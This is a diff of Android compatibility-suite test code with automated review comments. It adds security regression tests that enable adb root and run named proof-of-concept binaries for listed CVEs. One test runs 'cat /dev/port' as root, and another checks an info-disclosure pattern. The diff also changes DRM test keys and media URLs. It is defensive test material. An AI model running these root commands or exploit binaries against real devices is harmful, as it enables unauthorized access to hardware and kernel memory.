+ }
+
+ /**
+ * b/33966912
+ */
+ @SecurityTest
+ public void testPocCVE_2016_10231() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/snd/controlC0")) {
+ AdbUtils.runPoc("CVE-2016-10231", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/34276203
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0564() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/ion")) {
+ AdbUtils.runPocNoOutput("CVE-2017-0564", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/33649808
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0586() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/snd/controlC0")) {
+ AdbUtils.runPoc("CVE-2017-0586", getDevice(), 60);
+ }
+ }
+}
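Review bot: `testPocCVE_2017_0564` is the only test in this file that calls `AdbUtils.runPocNoOutput`, and it does not say why. The Poc16_12 change in this commit carries a comment for the same switch, and this call should too, e.g. `// This poc is very verbose so we ignore the output to avoid using a lot of memory.` if that is the reason here as well. The class also lacks the class-level `@SecurityTest` that Poc17_02, Poc17_06 and Poc17_07 have; the files should be consistent one way or the other.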
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_06.java b/hostsidetests/security/src/android/security/cts/Poc17_06.java
new file mode 100644
index 0000000..27c787e
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_06.java
@@ -0,0 +1,105 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc17_06 extends SecurityTestCase {
+
+ /**
+ * b/34328139
+ */
+ @SecurityTest
+ public void testPocBug_34328139() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/mdss_rotator")) {
+ AdbUtils.runPoc("Bug-34328139", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/33452365
+ */
+ @SecurityTest
+ public void testPocBug_33452365() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/snd/pcmC0D16c")) {
+ AdbUtils.runPoc("Bug-33452365", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/34125463
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0579() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/graphics/fb0")) {
+ AdbUtils.runPoc("CVE-2017-0579", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/33751424
+ */
+ @SecurityTest
+ public void testPocCVE_2017_7369() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/snd/controlC0")) {
+ AdbUtils.runPoc("CVE-2017-7369", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/35047780
+ */
+ @SecurityTest
+ public void testPocBug_35047780() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("Bug-35047780", getDevice(), 60);
+ }
+
+ /**
+ * b/35048450
+ */
+ @SecurityTest
+ public void testPocBug_35048450() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("Bug-35048450", getDevice(), 60);
+ }
+
+ /**
+ * b/35047217
+ */
+ @SecurityTest
+ public void testPocBug_35047217() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("Bug-35047217", getDevice(), 60);
+ }
+
+ /**
+ * b/35644815
+ */
+ @SecurityTest
+ public void testPocBug_35644815() throws Exception {
+ enableAdbRoot(getDevice());
+ infoDisclosure("Bug-35644815", getDevice(), 60,
+ "[\\s\\n\\S]*INFO DISC FLAG: 0000[\\s\\n\\S]*", false);
+ }
+
+}
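Review bot: In `testPocBug_35644815` the trailing `false` passed to `infoDisclosure` and the pattern are unexplained, and `infoDisclosure` is defined outside this hunk, so a reader cannot tell whether a match on `INFO DISC FLAG: 0000` means pass or fail; a one-line comment stating that would fix it. `[\\s\\n\\S]*` is a long spelling of "any character including newlines" and could be written `(?s).*`. The tests `testPocBug_35047780`, `testPocBug_35048450` and `testPocBug_35047217` run their binaries without the `containsDriver` guard the other tests use; if that is deliberate, a comment should name the interface they depend on.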
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_07.java b/hostsidetests/security/src/android/security/cts/Poc17_07.java
new file mode 100644
index 0000000..01c4bf8
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_07.java
@@ -0,0 +1,87 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc17_07 extends SecurityTestCase {
+
+ /**
+ * b/33863407
+ */
+ @SecurityTest
+ public void testPocBug_33863407() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/sys/kernel/debug/mdp/reg")) {
+ AdbUtils.runPoc("Bug-33863407", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/36604779
+ */
+ @SecurityTest
+ public void testPocBug_36604779() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/port")) {
+ AdbUtils.runCommandLine("cat /dev/port", getDevice());
+ }
+ }
+
+ /**
+ * b/34973477
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0705() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/proc/net/psched")) {
+ AdbUtils.runPoc("CVE-2017-0705", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/34126808
+ */
+ @SecurityTest
+ public void testPocCVE_2017_8263() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/ashmem")) {
+ AdbUtils.runPoc("CVE-2017-8263", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/34173755
+ */
+ @SecurityTest
+ public void testPocBug_34173755() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/ashmem")) {
+ AdbUtils.runPoc("Bug-34173755", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/35950388
+ */
+ @SecurityTest
+ public void testPocBug_35950388() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPocNoOutput("Bug-35950388", getDevice(), 60);
+ }
+}
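Review bot: None of the tests in this new file states what makes it pass or fail: each body only calls `AdbUtils.runPoc(...)` or `AdbUtils.runPocNoOutput(...)` (in `testPocBug_36604779`, `AdbUtils.runCommandLine("cat /dev/port", getDevice())`) and discards the result. The verdict presumably comes from a check in `SecurityTestCase` that is not visible in this diff. Each Javadoc currently holds only the bug number and should name the criterion, for example `Passes if the device stays healthy while the PoC runs; skipped when the driver node is absent.`, worded to match what the base class really checks. The `containsDriver` guards also let a test report success on devices without the node, which the results cannot distinguish from a real pass; a log line on the skip path would make that visible. The same applies to the new Poc17_08.java in the next file section.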
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_08.java b/hostsidetests/security/src/android/security/cts/Poc17_08.java
new file mode 100644
index 0000000..1d993bb
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_08.java
@@ -0,0 +1,65 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc17_08 extends SecurityTestCase {
+
+ /**
+ * b/36266767
+ */
+ @SecurityTest
+ public void testPocBug_36266767() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("Bug-36266767", getDevice(), 60);
+ }
+
+ /**
+ * b/36591162
+ */
+ @SecurityTest
+ public void testPocBug_36591162() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/qce")) {
+ AdbUtils.runPoc("Bug-36591162", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/35258962
+ */
+ @SecurityTest
+ public void testPocCVE_2017_9678() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/graphics/fb0")) {
+ AdbUtils.runPoc("CVE-2017-9678", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/36731152
+ */
+ @SecurityTest
+ public void testPocCVE_2017_9692() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/graphics/fb2")) {
+ AdbUtils.runPoc("CVE-2017-9692", getDevice(), 60);
+ }
+ }
+}
diff --git a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
index b3144e1..0f9da40 100644
--- a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
+++ b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
@@ -93,9 +93,11 @@
* Runs an info disclosure
**/
public void infoDisclosure(
- String pocName, ITestDevice device, int timeout, String pattern ) throws Exception {
+ String pocName, ITestDevice device, int timeout,
+ String pattern, boolean result) throws Exception {
- assertTrue("Pattern found. Info Disclosed.",
- AdbUtils.detectInformationDisclosure(pocName, device, timeout, pattern));
+ assertTrue("Pattern found.",
+ AdbUtils.detectInformationDisclosure
+ (pocName, device, timeout, pattern)==result );
}
}
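Review bot: The failure message `"Pattern found."` is only correct when `result` is false; with `result == true` the assertion fails precisely because the pattern was not found. Comparing with `==result` inside `assertTrue` also hides which value was expected, so `assertEquals("Unexpected info-disclosure pattern result", result, AdbUtils.detectInformationDisclosure(pocName, device, timeout, pattern));` reports both sides. The new boolean is undocumented: the comment above the method should say that `result` is the expected return value of `detectInformationDisclosure`, and a name such as `expectMatch` would help. The added required parameter changes the signature for every existing caller, and only one updated call site is visible in this diff.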
diff --git a/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerPinnedStackTests.java b/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerPinnedStackTests.java
index 7a691ec..b99a748 100644
--- a/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerPinnedStackTests.java
+++ b/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerPinnedStackTests.java
@@ -34,6 +34,8 @@
pinnedStackTester(PIP_ACTIVITY, PIP_ACTIVITY, true, false);
}
+ /**
+ * Disabled for b/35314835
public void testAlwaysFocusablePipActivity() throws Exception {
pinnedStackTester(ALWAYS_FOCUSABLE_PIP_ACTIVITY, ALWAYS_FOCUSABLE_PIP_ACTIVITY, true, true);
}
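Review bot: The tests are disabled by opening a Javadoc comment with `/**` here and closing it with the `*/` added in the next hunk. The commented-out source therefore becomes the doc comment of `pinnedStackTester`, and any `*/` later introduced inside the span would silently re-enable the code after it. A plain `// Disabled for b/35314835` note with the methods renamed so that name-based test discovery skips them (for example `disabledTestAlwaysFocusablePipActivity`) keeps the code compiling and makes the disabling easy to find. The signature of the second disabled test lies outside both hunks.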
@@ -42,6 +44,7 @@
pinnedStackTester(
LAUNCH_INTO_PINNED_STACK_PIP_ACTIVITY, ALWAYS_FOCUSABLE_PIP_ACTIVITY, false, true);
}
+ */
private void pinnedStackTester(String startActivity, String topActivityName,
boolean moveTopToPinnedStack, boolean isFocusable) throws Exception {
diff --git a/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java b/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
index fa1ae69..77119c0 100644
--- a/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
+++ b/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
@@ -19,10 +19,12 @@
import com.android.tradefed.device.CollectingOutputReceiver;
import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.log.LogUtil.CLog;
import com.android.tradefed.testtype.DeviceTestCase;
import java.util.HashMap;
import java.util.Map;
+import java.util.regex.Pattern;
public class CrossAppDragAndDropTests extends DeviceTestCase {
// Constants copied from ActivityManager.StackId. If they are changed there, these must be
@@ -47,13 +49,17 @@
private static final String INPUT_MOUSE_SWIPE = "input mouse swipe ";
private static final String TASK_ID_PREFIX = "taskId";
+ // Regex pattern to match adb shell am stack list output of the form:
+ // taskId=<TASK_ID>: <componentName> bounds=[LEFT,TOP][RIGHT,BOTTOM]
+ private static final String TASK_REGEX_PATTERN_STRING =
+ "taskId=[0-9]+: %s bounds=\\[[0-9]+,[0-9]+\\]\\[[0-9]+,[0-9]+\\]";
+
private static final int SWIPE_DURATION_MS = 500;
private static final String SOURCE_PACKAGE_NAME = "android.wm.cts.dndsourceapp";
private static final String TARGET_PACKAGE_NAME = "android.wm.cts.dndtargetapp";
private static final String TARGET_23_PACKAGE_NAME = "android.wm.cts.dndtargetappsdk23";
-
private static final String SOURCE_ACTIVITY_NAME = "DragSource";
private static final String TARGET_ACTIVITY_NAME = "DropTarget";
@@ -218,8 +224,15 @@
CollectingOutputReceiver outputReceiver = new CollectingOutputReceiver();
mDevice.executeShellCommand(AM_STACK_LIST, outputReceiver);
final String output = outputReceiver.getOutput();
+ final StringBuilder builder = new StringBuilder();
+ builder.append("Finding task info for task: ");
+ builder.append(name);
+ builder.append("\nParsing adb shell am output: " );
+ builder.append(output);
+ CLog.i(builder.toString());
+ final Pattern pattern = Pattern.compile(String.format(TASK_REGEX_PATTERN_STRING, name));
for (String line : output.split("\\n")) {
- if (line.contains(name)) {
+ if (pattern.matcher(line).find()) {
return line;
}
}
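Review bot: `name` is formatted into `TASK_REGEX_PATTERN_STRING` unescaped, so any regex metacharacters in it are interpreted. The `.` in a component name matches any character, and a `$` from an inner-class name would act as an anchor. Use `Pattern.compile(String.format(TASK_REGEX_PATTERN_STRING, Pattern.quote(name)))` so the name is matched literally. The enclosing method starts and ends outside this hunk, so what callers pass as `name` is not visible here.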
diff --git a/tests/tests/media/Android.mk b/tests/tests/media/Android.mk
index 66dcef6..47e8ae1 100644
--- a/tests/tests/media/Android.mk
+++ b/tests/tests/media/Android.mk
@@ -44,9 +44,11 @@
# include both the 32 and 64 bit versions
LOCAL_MULTILIB := both
-LOCAL_STATIC_JAVA_LIBRARIES := ctsmediautil ctsdeviceutil compatibility-device-util ctstestserver ctstestrunner ndkaudio
+LOCAL_STATIC_JAVA_LIBRARIES := ctsmediautil ctsdeviceutil compatibility-device-util
+LOCAL_STATIC_JAVA_LIBRARIES += ctstestserver ctstestrunner ndkaudio
-LOCAL_JNI_SHARED_LIBRARIES := libctsmediadrm_jni libctsmediacodec_jni libaudio_jni libnativehelper_compat_libc++ libndkaudioLib
+LOCAL_JNI_SHARED_LIBRARIES := libctsmediacodec_jni libaudio_jni libnativehelper_compat_libc++
+LOCAL_JNI_SHARED_LIBRARIES += libndkaudioLib libctsmediadrm_jni
# do not compress VP9 video files
LOCAL_AAPT_FLAGS := -0 .vp9
diff --git a/tests/tests/media/libmediandkjni/Android.mk b/tests/tests/media/libmediandkjni/Android.mk
index 5aa222a..1ccdede 100644
--- a/tests/tests/media/libmediandkjni/Android.mk
+++ b/tests/tests/media/libmediandkjni/Android.mk
@@ -19,7 +19,7 @@
#
include $(CLEAR_VARS)
-LOCAL_MODULE := libctsmediacodec_jni
+LOCAL_MODULE := libctsmediacodec_jni
LOCAL_MODULE_TAGS := optional
@@ -36,11 +36,11 @@
LOCAL_SHARED_LIBRARIES := \
libandroid libnativehelper_compat_libc++ \
- liblog libmediandk libEGL
+ liblog libmediandk
-LOCAL_SDK_VERSION := 24
+LOCAL_SDK_VERSION := 23
-LOCAL_CFLAGS := -Werror -Wall -DEGL_EGLEXT_PROTOTYPES -std=gnu++14
+LOCAL_CFLAGS := -Werror -Wall
include $(BUILD_SHARED_LIBRARY)
@@ -49,7 +49,7 @@
#
include $(CLEAR_VARS)
-LOCAL_MODULE := libctsmediadrm_jni
+LOCAL_MODULE := libctsmediadrm_jni
# Don't include this package in any configuration by default.
LOCAL_MODULE_TAGS := optional
@@ -64,16 +64,17 @@
$(JNI_H_INCLUDE) \
system/core/include
+
LOCAL_C_INCLUDES += $(call include-path-for, mediandk)
LOCAL_SHARED_LIBRARIES := \
libandroid libnativehelper_compat_libc++ \
- liblog libmediandk libdl libEGL
+ liblog libmediandk libdl
-LOCAL_SDK_VERSION := 24
-
-LOCAL_CFLAGS := -Werror -Wall -DEGL_EGLEXT_PROTOTYPES
+LOCAL_SDK_VERSION := 23
LOCAL_NDK_STL_VARIANT := c++_static
+LOCAL_CFLAGS := -Werror -Wall
+
include $(BUILD_SHARED_LIBRARY)
diff --git a/tests/tests/media/libmediandkjni/md5_utils.cpp b/tests/tests/media/libmediandkjni/md5_utils.cpp
index 7850cac..8e520e1 100644
--- a/tests/tests/media/libmediandkjni/md5_utils.cpp
+++ b/tests/tests/media/libmediandkjni/md5_utils.cpp
@@ -157,7 +157,7 @@
*/
void
MD5Transform(UWORD32 buf[4], UWORD32 const in[16]) {
- /*register*/ UWORD32 a, b, c, d;
+ UWORD32 a, b, c, d;
a = buf[0];
b = buf[1];
diff --git a/tests/tests/media/libmediandkjni/native-mediadrm-jni.cpp b/tests/tests/media/libmediandkjni/native-mediadrm-jni.cpp
index 571cec4..b98a6af 100644
--- a/tests/tests/media/libmediandkjni/native-mediadrm-jni.cpp
+++ b/tests/tests/media/libmediandkjni/native-mediadrm-jni.cpp
@@ -59,9 +59,9 @@
static const size_t kPlayTimeSeconds = 30;
static const size_t kUuidSize = 16;
-static const uint8_t kClearKeyUuid[kUuidSize] = {
- 0x10, 0x77, 0xef, 0xec, 0xc0, 0xb2, 0x4d, 0x02,
- 0xac, 0xe3, 0x3c, 0x1e, 0x52, 0xe2, 0xfb, 0x4b
+static const uint8_t kWidevineUuid[kUuidSize] = {
+ 0xed, 0xef, 0x8b, 0xa9, 0x79, 0xd6, 0x4a, 0xce,
+ 0xa3, 0xc8, 0x27, 0xdc, 0xd5, 0x1d, 0x21, 0xed
};
// The test content is not packaged with clearkey UUID,
@@ -77,8 +77,8 @@
// number of key ids
0x00, 0x00, 0x00, 0x01,
// key id
- 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30,
- 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30,
+ 0x60, 0x06, 0x1e, 0x01, 0x7e, 0x47, 0x7e, 0x87,
+ 0x7e, 0x57, 0xd0, 0x0d, 0x1e, 0xd0, 0x0d, 0x1e,
// size of data, must be zero
0x00, 0x00, 0x00, 0x00
};
@@ -86,23 +86,23 @@
static const uint8_t kKeyRequestData[] = {
0x7b, 0x22, 0x6b, 0x69, 0x64,
0x73, 0x22, 0x3a, 0x5b, 0x22,
- 0x4d, 0x44, 0x41, 0x77, 0x4d,
- 0x44, 0x41, 0x77, 0x4d, 0x44,
- 0x41, 0x77, 0x4d, 0x44, 0x41,
- 0x77, 0x4d, 0x44, 0x41, 0x77,
- 0x4d, 0x41, 0x22, 0x5d, 0x2c,
+ 0x59, 0x41, 0x59, 0x65, 0x41,
+ 0x58, 0x35, 0x48, 0x66, 0x6f,
+ 0x64, 0x2b, 0x56, 0x39, 0x41,
+ 0x4e, 0x48, 0x74, 0x41, 0x4e,
+ 0x48, 0x67, 0x22, 0x5d, 0x2c,
0x22, 0x74, 0x79, 0x70, 0x65,
0x22, 0x3a, 0x22, 0x74, 0x65,
0x6d, 0x70, 0x6f, 0x72, 0x61,
- 0x72, 0x79, 0x22, 0x7d
+ 0x72, 0x79, 0x22, 0x7d,
};
static const size_t kKeyRequestSize = sizeof(kKeyRequestData);
// base 64 encoded JSON response string, must not contain padding character '='
static const char kResponse[] = "{\"keys\":[{\"kty\":\"oct\"," \
- "\"kid\":\"MDAwMDAwMDAwMDAwMDAwMA\",\"k\":" \
- "\"Pwoz80CYueIrwHjgobXoVA\"}]}";
+ "\"kid\":\"YAYeAX5Hfod+V9ANHtANHg\",\"k\":" \
+ "\"GoogleTestKeyBase64ggg\"}]}";
static bool isUuidSizeValid(Uuid uuid) {
return (uuid.size() == kUuidSize);
@@ -246,12 +246,17 @@
for (size_t i = 0; i < psshInfo->numentries; i++) {
PsshEntry *entry = &psshInfo->entries[i];
- if (0 == memcmp(entry->uuid, kClearKeyUuid, sizeof(entry->uuid))) {
- aMediaObjects.setDrm(AMediaDrm_createByUUID(&juuid[0]));
- if (aMediaObjects.getDrm()) {
+ // We do not have clearkey content that contains ClearKey UUID in the
+ // pssh box. So we have to test if it has Widevine UUID instead.
+ // TODO: Replace kWidevineUuid with uuid when test content contains
+ // ClearKey UUID.
+ if (0 == memcmp(entry->uuid, kWidevineUuid, sizeof(entry->uuid))) {
+ aMediaObjects.setCrypto(
+ AMediaCrypto_new(entry->uuid, entry->data, entry->datalen));
+ if (aMediaObjects.getCrypto()) {
testResult = JNI_TRUE;
} else {
- ALOGE("Failed to create media drm=%zd", i);
+ ALOGE("Failed to create media crypto=%zd", i);
testResult = JNI_FALSE;
}
break;
@@ -288,7 +293,6 @@
AMediaCodec** codec) {
size_t numTracks = AMediaExtractor_getTrackCount(
const_cast<AMediaExtractor*>(extractor));
-
AMediaFormat* trackFormat = NULL;
for (size_t i = 0; i < numTracks; ++i) {
trackFormat = AMediaExtractor_getTrackFormat(
@@ -301,7 +305,6 @@
if (!AMediaFormat_getString(
trackFormat, AMEDIAFORMAT_KEY_MIME, &mime)) {
ALOGE("no mime type");
-
AMediaFormat_delete(trackFormat);
return;
} else if (isAudio(mime) || isVideo(mime)) {
@@ -347,7 +350,6 @@
AMediaCodecCryptoInfo *cryptoInfo =
AMediaExtractor_getSampleCryptoInfo(extractor);
-
if (cryptoInfo) {
status = AMediaCodec_queueSecureInputBuffer(
codec, bufferIndex, 0, cryptoInfo,
@@ -418,7 +420,6 @@
}
addTracks(audioExtractor, NULL, NULL, &audioCodec);
-
addTracks(videoExtractor, crypto, window, &videoCodec);
bool sawAudioInputEos = false;
@@ -614,7 +615,7 @@
int count = 0;
while (!gGotVendorDefinedEvent && count++ < 5) {
// Prevents race condition when the event arrives late
- usleep(2000);
+ usleep(1000);
}
if (!gGotVendorDefinedEvent) {
ALOGE("Event listener did not receive the expected event.");
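Review bot: The wait for `gGotVendorDefinedEvent` is now bounded at five iterations of `usleep(1000)`, roughly 5 ms in total, which narrows the race the comment mentions rather than removing it. A listener callback delivered later than that fails the test. A larger iteration count, or a condition variable signalled from the listener, would make the result independent of scheduling. How the flag is declared is outside this hunk; if it is a plain `bool` written from the listener thread it should be `std::atomic<bool>`, so that the loop is guaranteed to observe the write.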
diff --git a/tests/tests/media/src/android/media/cts/ConnectionStatus.java b/tests/tests/media/src/android/media/cts/ConnectionStatus.java
index 407e553..37fc75e 100644
--- a/tests/tests/media/src/android/media/cts/ConnectionStatus.java
+++ b/tests/tests/media/src/android/media/cts/ConnectionStatus.java
@@ -132,14 +132,6 @@
}
public void testConnection(Uri uri) {
- final String GOOG = "www.google.com";
-
- if (pingTest(GOOG)) {
- Log.d(TAG, "Successfully pinged " + GOOG);
- } else {
- Log.e(TAG, "Failed to ping " + GOOG);
- }
-
if (pingTest(uri.getHost())) {
Log.d(TAG, "Successfully pinged " + uri.getHost());
} else {
diff --git a/tests/tests/media/src/android/media/cts/NativeClearKeySystemTest.java b/tests/tests/media/src/android/media/cts/NativeClearKeySystemTest.java
index 9ead8fb..1d4500f 100644
--- a/tests/tests/media/src/android/media/cts/NativeClearKeySystemTest.java
+++ b/tests/tests/media/src/android/media/cts/NativeClearKeySystemTest.java
@@ -18,13 +18,12 @@
import static org.junit.Assert.assertThat;
import static org.junit.matchers.JUnitMatchers.containsString;
+import android.cts.util.MediaUtils;
import android.net.Uri;
-import android.os.Build;
import android.util.Log;
import android.view.Surface;
import android.view.SurfaceHolder;
-import android.cts.util.MediaUtils;
import com.google.android.collect.Lists;
import java.nio.ByteBuffer;
@@ -45,12 +44,11 @@
private static final String ISO_BMFF_VIDEO_MIME_TYPE = "video/avc";
private static final String ISO_BMFF_AUDIO_MIME_TYPE = "audio/avc";
private static final Uri CENC_AUDIO_URL = Uri.parse(
- "https://storage.googleapis.com/wvmedia/clear/h264/llama/" +
- "llama_aac_audio.mp4");
-
+ "http://yt-dash-mse-test.commondatastorage.googleapis.com/media/" +
+ "car_cenc-20120827-8c.mp4");
private static final Uri CENC_CLEARKEY_VIDEO_URL = Uri.parse(
- "https://storage.googleapis.com/wvmedia/clearkey/" +
- "llama_h264_main_720p_8000.mp4");
+ "http://yt-dash-mse-test.commondatastorage.googleapis.com/media/" +
+ "car_cenc-20120827-88.mp4");
private static final int UUID_BYTE_SIZE = 16;
private static final UUID CLEARKEY_SCHEME_UUID =
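Review bot: Both test streams move from `https://` to `http://`, so the media this DRM test parses and decrypts is fetched without transport integrity and can be altered on the network path of the test lab. If the `yt-dash-mse-test.commondatastorage.googleapis.com` host serves the same objects over TLS (not verifiable from this diff), keep the scheme as `https://`. Otherwise a comment above `CENC_AUDIO_URL` should state why cleartext is required, since it also ties the test to cleartext traffic being permitted for the test app.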
@@ -96,7 +94,7 @@
private boolean deviceHasMediaDrm() {
// ClearKey is introduced after KitKat.
- if (Build.VERSION.SDK_INT <= android.os.Build.VERSION_CODES.KITKAT) {
+ if (android.os.Build.VERSION.SDK_INT <= android.os.Build.VERSION_CODES.KITKAT) {
Log.i(TAG, "This test is designed to work after Android KitKat.");
return false;
}
@@ -172,12 +170,25 @@
}
connectionStatus.testConnection(videoUrl);
- if (!MediaUtils.checkCodecsForPath(mContext, videoUrl.toString())) {
+ if (!MediaUtils.checkCodecsForPath(mContext, videoUrl.getPath())) {
Log.i(TAG, "Device does not support " +
videoWidth + "x" + videoHeight + " resolution for " + mimeType);
return; // skip
}
+ // set to true if modify isVersionSmaller()
+ if (false)
+ unitTestIsVersionSmaller();
+
+ // This test requires two changes in frameworks/av (go/av/1628977 and
+ // go/ag/1598174) that are in 7.1.2 and above.
+ // Version 8 and above does not need this check.
+ if (isVersionSmaller(android.os.Build.VERSION.RELEASE, "7.1.2")) {
+ Log.i(TAG, "This test requires android \"7.1.2\" or higher.");
+ Log.i(TAG, "This device is running \"" +
+ android.os.Build.VERSION.RELEASE + "\".");
+ return; // skip
+ }
PlaybackParams params = new PlaybackParams();
params.surface = mActivity.getSurfaceHolder().getSurface();
params.mimeType = mimeType;
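Review bot: `if (false) unitTestIsVersionSmaller();` leaves the self-check permanently dead and unbraced. `unitTestIsVersionSmaller` (added in the next hunk) needs no device state, so it could be a test method of its own and run on every pass. `isVersionSmaller(android.os.Build.VERSION.RELEASE, "7.1.2")` also assumes the release string is purely dotted digits. `intVersion` splits on `\\.` and its parsing is outside the hunk, but a non-numeric release name on a pre-release build would presumably throw there instead of skipping. Checking `Build.VERSION.SDK_INT` first, or catching `NumberFormatException` and treating it as "not smaller", would avoid that.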
@@ -191,6 +202,16 @@
params.surface.release();
}
+ private void unitTestIsVersionSmaller() {
+ assertTrue(isVersionSmaller("6.9", "7.1.2"));
+ assertTrue(isVersionSmaller("7.1", "7.1.2"));
+ assertTrue(isVersionSmaller("7.1.1", "7.1.2"));
+ assertTrue(isVersionSmaller("7.1.1.4", "7.1.2"));
+ assertFalse(isVersionSmaller("7.1.2", "7.1.2"));
+ assertFalse(isVersionSmaller("8.0", "7.1.2"));
+ assertFalse(isVersionSmaller("8.1.2", "7.1.2"));
+ }
+
private ArrayList<Integer> intVersion(String version) {
String versions[] = version.split("\\.");
@@ -201,6 +222,31 @@
return versionNumbers;
}
+ /**
+ * Return true if smaller, return false if great than or equal to the
+ * target version.
+ */
+ private boolean isVersionSmaller(String testVersion, String targetVersion) {
+ ArrayList<Integer> intTestVersion = intVersion(testVersion);
+ ArrayList<Integer> intTargetVersion = intVersion(targetVersion);
+
+ Iterator itr = intTestVersion.iterator();
+ for (int targetNumber : intTargetVersion) {
+ if (itr.hasNext()) {
+ int testNumber = (int) itr.next();
+ if (testNumber == targetNumber) {
+ continue;
+ } else {
+ return testNumber < targetNumber;
+ }
+ } else {
+ // treat test version as 0
+ return 0 != targetNumber;
+ }
+ }
+ return false;
+ }
+
private static native boolean isCryptoSchemeSupportedNative(final byte[] uuid);
private static native boolean testClearKeyPlaybackNative(final byte[] uuid,
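Review bot: When the test version has fewer components than the target, `return 0 != targetNumber;` returns on the first missing component, so `isVersionSmaller("7", "7.0.1")` yields false although 7 is older than 7.0.1. Only a non-zero target component decides the comparison; a zero one should fall through to the next, i.e. `if (targetNumber != 0) { return true; }`. The raw `Iterator` with the `(int) itr.next()` cast should be `Iterator<Integer>`, and the Javadoc typo `great than` should read `greater than`.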
